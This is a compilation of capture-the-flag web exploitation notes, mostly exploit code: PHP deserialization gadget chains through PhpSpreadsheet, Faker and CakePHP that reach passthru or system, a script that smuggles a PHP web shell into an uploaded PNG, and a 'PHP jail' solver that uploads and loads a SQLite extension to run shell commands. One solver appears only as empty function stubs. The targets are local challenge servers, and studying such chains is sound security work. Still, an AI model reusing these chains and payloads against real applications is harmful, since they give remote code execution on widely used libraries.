Our entrypoint is in \PhpOffice\PhpSpreadsheet\Collection\Cells class
public function __destruct(){
$this->cache->deleteMultiple($this->getAllCacheKeys());
}
That might allow us controlling an arbitrary middle object, but alas, this is not the case this time.
Next we have the getAllCacheKeys() method call, that
private function getAllCacheKeys(){
$keys = [];
foreach ($this->index as $coordinate => $value) {
$keys[] = $this->cachePrefix . $coordinate;
}
return implode(',', $keys);
}
Allows us getting a __toString() call on the $this->cachePrefix object
Setting the cachePrefix to \PhpOffice\PhpSpreadsheet\Comment instance
public function __toString(): string {
return $this->text->getPlainText();
}
This allows us another call (now looking at it, this might have been maybe possible already on the previous step… oh-well, not going back to test now 😁)
Anyway, setting the text parameter to \Faker\ValidGenerator, we reach this super cool (and from defender's perspective super dangerous) function, that triggers, whenever the object is missing the method to handle the call.
Luckily, the ValidGenerator doesn't implement a function getPlainText, so we're good.
public function __call($name, $arguments){
$i = 0;
do {
$res = call_user_func_array([$this->generator, $name], $arguments);
++$i;
if ($i > $this->maxRetries) {
throw new \OverflowException(sprintf('Maximum retries of %d reached without finding a valid value', $this->maxRetries));
}
} while (!call_user_func($this->validator, $res));
return $res;
}
Next we need to somehow control the function and argument, which we can do if we set the generator and validator
We can achieve our code execution via the
(!call_user_func($this->validator, $res));
Because the validator parameter we can control. Next we need few more things. We need to reach the block without throwing an error, which means that something needs to receive the getPlainText call and answer without failing. Bypassing the maxRetries is trivial, since we control the parameter. Further, since the validator gets the same $res parameter as the argument, we need to also control the output of
call_user_func_array([$this->generator, 'getPlainText']
Luckily, the Faker has another trick in our favour -> \Faker\DefaultGenerator that has
public function __call($method, $attributes)
{
return $this->default;
}
I have discovered, that is useful to have the "Faked" classes and "Original" classes side-by-side. Given that the serialized output is a string, I can simply do some string replacements to be able to target the original classes (obviously I cannot use Maker and ShpOffice anywhere else in the payload) 🤷
This is
<?php
namespace Maker {
class DefaultGenerator {
private $default;
function __construct() {
$this->default = 'cat /*.txt'; // Argument
}
}
class ValidGenerator {
private $generator;
private $validator;
private $formatters;
private $maxRetries;
function __construct() {
$this->generator = new \Maker\DefaultGenerator();
$this->validator = 'passthru'; // Function
$this->maxRetries = 2;
}
}
}
namespace ShpOffice\PhpSpreadsheet\Collection\Memory {
class SimpleCache3 {
}
}
namespace ShpOffice\PhpSpreadsheet\Worksheet\Worksheet{
class Worksheet{
private $parent;
function __construct() {
}
}
}
namespace ShpOffice\PhpSpreadsheet {
class Comment {
public $text;
function __construct() {
$this->text = new \Maker\ValidGenerator();;
}
}
}
namespace ShpOffice\PhpSpreadsheet\Collection{
class Cells{
private $parent;
private $cache;
private $index;
private $cachePrefix;
function __construct() {
$this->parent = new \ShpOffice\PhpSpreadsheet\Worksheet\Worksheet\Worksheet();
$this->cache = new \ShpOffice\PhpSpreadsheet\Collection\Memory\SimpleCache3();
$this->cachePrefix = new \ShpOffice\PhpSpreadsheet\Comment();
$this->index = [
'a' => 'b'
];
}
}
}
namespace {
    // Serialize the chain built from the stand-in classes, then rename the
    // stand-in namespaces (Maker, ShpOffice) in the serialized string so it
    // refers to Faker and PhpOffice instead.
    echo "POP chain\n\n";
    $part = new \ShpOffice\PhpSpreadsheet\Collection\Cells();
    $serialized = (serialize($part));
    $serialized = str_replace('Maker', 'Faker', $serialized);
    $serialized = str_replace('ShpOffice', 'PhpOffice', $serialized);
    echo urlencode($serialized);
    // unserialize($serialized);
    die("\n\nEND");
}
author
I wonder if you have found the intended chain for the donor challenge yet? Here is my solution:
import re
session = requests.session()
def get_cookies(url):
def find_flag_filename(cookies,url):
def get_flag_content(cookies, flag_filename,url):
def main():
if __name__ == "__main__":
Of course, it needs to be changed a bit to match the Patchstack team's flag structure
<@663394727688798231> <@658787334984171539>
# PHP request smuggling
<file src="file://%7B%22source%22%3A%22https%3A%2F%2Fprod-files-secure.s3.us-west-2.amazonaws.com%2F39d1be85-e7c6-4263-a666-a42da95a70df%2F623fe104-d76b-498f-b947-72dcd447fb71%2Fphpnotes-ec604b5d03f9d522_(1).tar.xz%22%2C%22permissionRecord%22%3A%7B%22table%22%3A%22block%22%2C%22id%22%3A%2219548583-e65d-80c0-b834-eab16e581516%22%2C%22spaceId%22%3A%2239d1be85-e7c6-4263-a666-a42da95a70df%22%7D%7D"></file>
from here: [phpnotes \| hxp 38C3 CTF](https://2024.ctf.link/internal/challenge/b98bbcec-faad-40a0-8efa-e2998039d5be/)
[phpnotes - hxp 38C3 CTF Web Challenge Writeup \| siunam’s Website](https://siunam321.github.io/ctf/hxp-38C3-CTF/Web/phpnotes/)
<empty-block/>
Instead, we (ab)use the fact that the storage backend uses `werkzeug.util.secure_filename` to derive a “secure” filename for the note (without slashes or path traversal, etc.) — but that performs NFKD unicode normalization of the input first, so lots of Unicode characters get converted to normal printable ASCII. You can find normalization tables [here](https://www.unicode.org/charts/normalization/). For example, `ᶠₗₐℊ` (`\u1da0\u2097\u2090\u210a`) will be normalized to `flag`.
<empty-block/>
# PHP_ICO [https://github.com/chrisbliss18/php-ico](https://github.com/chrisbliss18/php-ico) / bypass imagecreatefromstring
You can upload a file containing a specially crafted PNG, and it will be saved on the server with your payload in plain text
PHP_ICO Exploit Note: Bypassing imagecreatefromstring
Source: chrisbliss18/php-ico
Summary
You can upload a specially crafted PNG file that embeds your payload as plain text.
The server will save the file with your payload intact, allowing for potential exploitation.
Proof of Concept
import httpx
import asyncio
import numpy as np
import cv2
# Base URL of the target application
URL = "http://localhost:8080"


class BaseAPI:
    """Hold the shared async HTTP client used by the API wrapper."""

    def __init__(self, url=URL) -> None:
        self.c = httpx.AsyncClient(base_url=url)
class API(BaseAPI):
    """Client for the upload endpoint at ``/``."""

    async def convert_png_to_ico(self, file) -> httpx.Response:
        """POST *file* as the multipart ``file`` field to ``/`` and return the response."""
        return await self.c.post("/", files={"file": file})
def generate_image_from_bits(bits: str, size: tuple, output_file: str):
    """
    Generate an RGBA image from binary bits and save it to a file.

    Bit ``k`` is stored at column ``k % width`` of row
    ``height - 1 - k // width``, so rows are filled from the bottom up.
    Every pixel is white; a ``'1'`` bit gets alpha 0 and a ``'0'`` bit gets
    alpha 255.  Pixels beyond the last bit stay white with alpha 255.

    :param bits: Binary data to encode into the image.
    :param size: Tuple specifying the image dimensions (width, height).
    :param output_file: Path to save the output PNG file.
    :raises ValueError: If *bits* holds more bits than the image has pixels.
    """
    width, height = size
    capacity = width * height
    if len(bits) > capacity:
        raise ValueError(
            f"{len(bits)} bits do not fit into a {width}x{height} image"
        )

    # Image arrays are indexed [row][column], so the shape must be
    # (height, width, 4); (width, height, 4) only works for square images.
    # Starting from all-255 also covers the filler for unused pixels.
    im = np.full((height, width, 4), 255, np.uint8)

    for ind, bit in enumerate(bits):
        row, x = divmod(ind, width)
        y = height - 1 - row  # Flip vertically to match OpenCV's top-left origin
        im[y, x, 3] = (1 - int(bit)) * 255

    # Save the image to disk
    cv2.imwrite(output_file, im)
    print(f"Image saved to {output_file}")
async def main():
    """Main function to generate and upload a payload as a PNG file."""
    # Generate payload and convert to bits (8 bits per byte, MSB first)
    payload = b"<?php system($_GET['c'])?>"
    bits = ''.join(f"{byte:08b}" for byte in payload)
    print(bits)
    print(len(bits))

    # Image size
    size = (32, 32)

    # Generate the image from bits
    output_file = "result.png"
    generate_image_from_bits(bits, size, output_file)

    # Send the generated image to the server.  Both the file handle and the
    # HTTP client are released even if the request fails.
    api = API()
    try:
        with open(output_file, "rb") as fh:
            response = await api.convert_png_to_ico((".php", fh, "image/png"))
    finally:
        await api.c.aclose()
    print(response.text)


if __name__ == "__main__":
    asyncio.run(main())
POP gadget in CakePHP 5.1.4
Reference: SUCTF-2025 / web / SU_POP / writeup
<?php
// Gadget-chain generator: defines stand-in classes under the same fully
// qualified names as the library classes, wires them together and writes the
// serialized chain to the file "ser".
// The namespace separators were missing from every class and namespace
// name; they are restored here so the names resolve.
namespace React\Promise\Internal {
    class RejectedPromise
    {
        private $reason = "x";
        /** @var bool */
        private $handled = false;
        public function __construct($reason)
        {
            $this->reason = $reason;
        }
    }
}
namespace Cake\TestSuite\Constraint\Response {
    class HeaderEquals
    {
        protected string $headerName;
    }
}
namespace Twig {
    class ExtensionSet
    {
        private $initialized = true;
        private $parserCallbacks = ["system"];
    }
}
namespace Cake\ORM {
    class Table
    {
        protected BehaviorRegistry $_behaviors;
        public function __construct()
        {
            $this->_behaviors = new \Cake\ORM\BehaviorRegistry();
        }
        // Wires the nested objects: this table maps "name" -> Cache::clear,
        // and the inner table maps "emptydirectory" -> ExtensionSet::getTokenParser.
        public function initTable1()
        {
            $cache = new \Composer\Cache();
            $table2 = new \Cake\ORM\Table();
            $extSet = new \Twig\ExtensionSet();
            $table2->_behaviors->setLoaded(
                [
                    "emptydirectory" => $extSet,
                    "x" => $extSet,
                    "lol" => new \React\Promise\Internal\RejectedPromise("lol")
                ],
                ["emptydirectory" => ["x", "getTokenParser"]]
            );
            $cache->setFilesystem($table2);
            $this->_behaviors->setLoaded(
                [
                    "name" => $cache,
                    "x" => $cache,
                    // "table" => new \React\Promise\Internal\RejectedPromise("lol")
                ],
                ["name" => ["x", "clear"]]
            );
        }
    }
    class BehaviorRegistry
    {
        protected array $_methodMap;
        protected array $_loaded;
        /*
        public function __construct()
        {
            $this->_loaded = [
                "name" => new \Composer\Cache(),
                "x" => new \Composer\Cache(),
                // "table" => new \React\Promise\Internal\RejectedPromise("lol")
            ];
        }
        */
        public function setLoaded($loaded, $_methodMap)
        {
            $this->_loaded = $loaded;
            $this->_methodMap = $_methodMap;
        }
    }
}
namespace Cake\Cache\Engine {
    class RedisEngine
    {
        protected $_Redis;
        public function __construct()
        {
            $this->_Redis = new \Cake\ORM\Table();
        }
    }
}
namespace Cake\Database\Log {
    class LoggedQuery
    {
    }
}
namespace Cake\View {
    class Cell
    {
    }
}
namespace Cake\Http\Client {
    class FormData
    {
        protected array $_parts = [];
        public function __construct()
        {
            $this->_parts = [new \Cake\ORM\Table()];
            $this->_parts[0]->initTable1();
        }
    }
}
namespace Cake\Collection\Iterator {
    class ReplaceIterator
    {
        protected $_callback = "system";
        protected \Traversable $_innerIterator;
        public function __construct()
        {
            $this->_innerIterator = new \ArrayIterator(["abcd"]);
        }
    }
}
/*
React\Promise\Internal\RejectedPromise => __destruct => tostring
Cake\Http\Client\FormData => toString
*/
namespace Composer {
    /*
    public function exists(): bool
    {
        return $this->getAdapter()->hasTable($this->getName());
    }
    */
    class Cache
    {
        private $enabled = true;
        // Command string stored in $root.
        private $root = "find /flag.txt -exec cat {} \\;";
        private $filesystem;
        public function __construct()
        {
            // $this->filesystem = new \Cake\ORM\Table();
        }
        public function setFilesystem($filesystem)
        {
            $this->filesystem = $filesystem;
        }
    }
}
namespace {
    // $o = new \Cake\Cache\Engine\RedisEngine();
    // Only the last assignment to $e is used below.
    $e = new \Cake\Database\Log\LoggedQuery();
    $e = new \Cake\View\Cell();
    $e = new \Cake\Http\Client\FormData();
    $o = new \React\Promise\Internal\RejectedPromise($e);
    file_put_contents("ser", serialize($o));
}
?>
Usage note:
/ser/?ser=base64encoded
Related reference: CakePHP 反序列化 POP 链挖掘 - 先知社区
yeah ill just drop the relevant snippets
Relevant snippets
public function __destruct()
{
if ($this->handled) {
return;
}
$handler = set_rejection_handler(null);
if ($handler === null) {
$message = 'Unhandled promise rejection with ' . $this->reason;
$this->reason is untyped so we can use any object here
public function __toString(): string
{
if ($this->isMultipart()) {
$boundary = $this->boundary();
$out = '';
foreach ($this->_parts as $part) {
$out .= "--{$boundary}\\r\\n";
$out .= (string)$part;
$out .= "\\r\\n";
}
$out .= "--{$boundary}--\\r\\n";
return $out;
}
$data = [];
foreach ($this->_parts as $part) {
$data[$part->name()] = $part->value();
$this->_parts can be set to anything, so we will use $part->name() to trigger __call of ORM\Table.php
public function call(string $method, array $args = []): mixed
{
$method = strtolower($method);
if ($this->hasMethod($method) && $this->has($this->_methodMap[$method][0])) {
[$behavior, $callMethod] = $this->_methodMap[$method];
return $this->_loaded[$behavior]->{$callMethod}(...$args);
}
We can set _methodMap and _loaded such that we have full control over $this->_loaded[$behavior]->{$callMethod}, but not $args.
public function clear()
{
if ($this->isEnabled() && !$this->readOnly) {
$this->filesystem->emptyDirectory($this->root);
return true;
}
return false;
}
Kawaii PHP Jail
| Event Name | - |
| Source URL | - |
| Challenge Name | Kawaii PHP Jail |
Attachments
solve.py
References
eval(isset($_GET['cmd']) ? $_GET['cmd'] : '') gives direct attacker-controlled PHP execution.
The jail leaves file_put_contents() available, allows writes under /tmp, and does not block SQLite extension loading through PDO.
Exploit: upload a base64-encoded shared object for /tmp/libhello_fd.so, decode it server-side, create new Pdo\Sqlite('sqlite::memory:'), call $db->loadExtension('/tmp/libhello_fd.so'), then execute SELECT exec_cmd('cat /flag.txt') via a function exported by the extension.
Tested against http://localhost:12345/; the solver successfully loaded the extension and read /flag.txt.
why it is vulnerable
// src/index.php
echo eval(isset($_GET['cmd']) ? $_GET['cmd'] : '');
// php.ini
disable_functions = exec,shell_exec,system,passthru,...,dl,...
open_basedir = /var/www/html:/tmp
exploit payload
$db = new Pdo\Sqlite('sqlite::memory:');
$db->loadExtension('/tmp/libhello_fd.so');
echo $db->query("SELECT exec_cmd('cat /flag.txt')")->fetchColumn();
solver
#include <stdio.h>
#include <string.h>
#include <sqlite3ext.h>
SQLITE_EXTENSION_INIT1
/*
 * SQL function body: run the first argument as a shell command via popen()
 * and return what the command wrote to stdout as text.
 *
 * At most sizeof(output) - 1 bytes are kept; the rest of the stream is still
 * read so the child can finish.  A NULL argument yields SQL NULL.  If popen()
 * fails the result is an empty string.
 */
static void exec_function(sqlite3_context *context, int argc, sqlite3_value **argv) {
    const char *command;
    FILE *fp;
    char buffer[4096], output[8192] = "";
    size_t used = 0;

    (void)argc; /* registered with exactly one argument */

    command = (const char*)sqlite3_value_text(argv[0]);
    if (command == NULL) {
        /* sqlite3_value_text() returns NULL for SQL NULL; popen(NULL) is invalid. */
        sqlite3_result_null(context);
        return;
    }

    fp = popen(command, "r");
    while (fp && fgets(buffer, sizeof(buffer), fp)) {
        size_t len = strlen(buffer);
        size_t room = sizeof(output) - 1 - used;
        if (len > room) len = room;
        /* Append at the tracked offset instead of rescanning output each time. */
        memcpy(output + used, buffer, len);
        used += len;
        output[used] = '\0';
    }
    if (fp) pclose(fp);

    /* SQLITE_TRANSIENT: SQLite copies the stack buffer before we return. */
    sqlite3_result_text(context, output, (int)used, SQLITE_TRANSIENT);
}
/*
 * Extension entry point: registers the one-argument SQL function exec_cmd,
 * implemented by exec_function.  Returns the result code of the
 * registration so a failure is reported to the loader.
 */
int sqlite3_hellofd_init(sqlite3 *db, char **pzErrMsg, const sqlite3_api_routines *pApi) {
    (void)pzErrMsg; /* no error message is produced here */
    SQLITE_EXTENSION_INIT2(pApi);
    return sqlite3_create_function(db, "exec_cmd", 1, SQLITE_UTF8, 0, exec_function, 0, 0);
}
import asyncio
import base64
import httpx
URL = "http://localhost:12345/"
SO_B64 = base64.b64encode(open("libhello_fd.so", "rb").read()).decode()
async def php(code):
    """Send *code* as the ``cmd`` query parameter to ``/`` and return the response text.

    A new AsyncClient is opened for each call and closed when the call ends.
    """
    async with httpx.AsyncClient(base_url=URL, timeout=30) as c:
        r = await c.get("/", params={"cmd": code})
        return r.text
async def main():
    """Upload the base64 text in chunks, decode it on the server, load it and print the query result."""
    # 4000-character chunks; the first write creates the file and later
    # writes append to it via FILE_APPEND.
    for i in range(0, len(SO_B64), 4000):
        chunk = SO_B64[i:i+4000]
        mode = "" if i == 0 else ",FILE_APPEND"
        await php(f"file_put_contents('/tmp/libhello_fd.so.b64','{chunk}'{mode});")

    # Turn the uploaded base64 text back into the binary shared object.
    await php("file_put_contents('/tmp/libhello_fd.so', base64_decode(file_get_contents('/tmp/libhello_fd.so.b64')));")

    # Load the extension into an in-memory database and call exec_cmd.
    print(await php("$db = new Pdo\\Sqlite('sqlite::memory:'); $db->loadExtension('/tmp/libhello_fd.so'); echo $db->query(\"SELECT exec_cmd('cat /flag.txt')\")->fetchColumn();"))


asyncio.run(main())